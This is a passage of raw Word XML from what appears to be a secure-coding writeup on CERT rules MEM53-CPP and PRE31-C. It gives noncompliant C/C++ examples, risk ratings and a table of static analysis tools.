                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="564B8DEE"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B90D98D"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>g() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EF6B3E3"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Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*ptr = std::</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>malloc</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(S));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="095FF81D"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lastRenderedPageBreak/>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>S *s = </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(ptr) S;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41BE32B2"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38ABBF6A"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Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>s-&gt;f();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FDB1CCD"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03ECAF68"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Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>s-&gt;~S();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A11CE79" w14:textId="77777777" w:rsidR="00416161"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>free</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(ptr);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="681B4B09" w14:textId="1D046730" w:rsidR="00F72634" w:rsidRPr="00416161" w:rsidRDefault="00416161" w:rsidP="00416161">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>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EBE90C9" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC5300F" w14:textId="7669A823" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(9) Use Effective Quality Assurance Techniques- </w:t>
            </w:r>
            <w:r w:rsidR="005F3C12">
              <w:t>Incorporating good quality assurance techniques such as source code audits can help developers find issues such as the one presented in the noncompliant code</w:t>
            </w:r>
            <w:r w:rsidR="005F3C12">
              <w:t xml:space="preserve"> where the destructor was not explicitly called</w:t>
            </w:r>
            <w:r w:rsidR="005F3C12">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DDD77A8" w14:textId="008ADC51" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>(2) Heed Compiler Warnings-</w:t>
            </w:r>
            <w:r w:rsidR="005F3C12">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F3C12">
              <w:t>If a warning should appear to let the developer know that a</w:t>
            </w:r>
            <w:r w:rsidR="005F3C12">
              <w:t xml:space="preserve">n object has not been destroyed, </w:t>
            </w:r>
            <w:r w:rsidR="005F3C12">
              <w:t>the developer should take note and modify the code.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2BE7614" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FECF226" w14:textId="043957EF" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001260E5" w14:textId="614A1AB7" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C1BD06F" w14:textId="7E82F9E2" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="321828B7" w14:textId="4C004430" w:rsidR="00B475A1" w:rsidRDefault="00267F7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82EF29E" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Helix QAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35911E79" w14:textId="19C24DD2" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41B4278B" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>C++4761,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13566095" w14:textId="77777777" w:rsidR="00267F7F" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>C++4762,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="049F1DD8" w14:textId="77777777" w:rsidR="00267F7F" w:rsidRDefault="00267F7F" w:rsidP="00267F7F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>C++4766,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B4ADD74" w14:textId="11DCEDED" w:rsidR="00267F7F" w:rsidRDefault="00267F7F" w:rsidP="00267F7F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>C++4767</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="221E6849" w14:textId="63A059A3"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0DEB06D" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Parasoft C/C++test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485EEED8" w14:textId="2D57CFCE" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CFDA649" w14:textId="03B9D9EB" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CERT_CPP-MEM53-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29E14C36" w14:textId="083329E6" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00267F7F">
              <w:t>Do not invoke malloc/realloc for objects having constructors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="092940EA" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7589B551" w14:textId="5F9A7852" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Polyspace Bug Finder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EFDCB9A" w14:textId="2EEA6E50" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>R2022b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2978B16E" w14:textId="1384D949" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CERT C++: MEM53-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163BA4AD" w14:textId="36F23E46" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00267F7F">
              <w:t>Checks for objects allocated but not initialized (rule fully covered).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="41744220" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EAC101A" w14:textId="0EE8B8EE" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>PVS-Studio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79F266AC" w14:textId="4914FD2A" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6359BB49" w14:textId="7692A898" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>V630, V749</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0472C174" w14:textId="735AC29B"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8A98D24" w:rsidR="00381847" w:rsidRDefault="00AA1628">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>PRE31-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33ACFFEA" w14:textId="3080295C" w:rsidR="00381847" w:rsidRDefault="00AA1628" w:rsidP="000A1B62">
            <w:r w:rsidRPr="00AA1628">
              <w:t>Avoid side effects in arguments to unsafe macros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A37D273" w:rsidR="00F72634" w:rsidRDefault="000A1B62" w:rsidP="0015146B">
            <w:r>
              <w:t xml:space="preserve">The assert() macro is </w:t>
            </w:r>
            <w:r w:rsidR="00AA1628">
              <w:t>convenient for incorporating diagnostic tests. However, the assert() macro here contains an expression (index++) which has a side effect.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="058CAEAA" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7E0E5528"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;assert.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E5D65F"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;stddef.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A5DB149"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37670EE4"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>process(</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>index) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07B324B6"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>assert</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(index++ &gt; 0); </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/* Side effect */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E941276"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1628">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/* ... */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28BA138C" w14:textId="681023DE" w:rsidR="00F72634" w:rsidRPr="000A1B62" w:rsidRDefault="00AA1628" w:rsidP="000A1B62">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D39539D" w:rsidR="00F72634" w:rsidRDefault="00AA1628" w:rsidP="0015146B">
            <w:r>
              <w:t>This solution avoids the possibility of side effects occurring within assertions because the expression that contains the side effect is moved outside of the assert(macro).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="2DA5938A" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
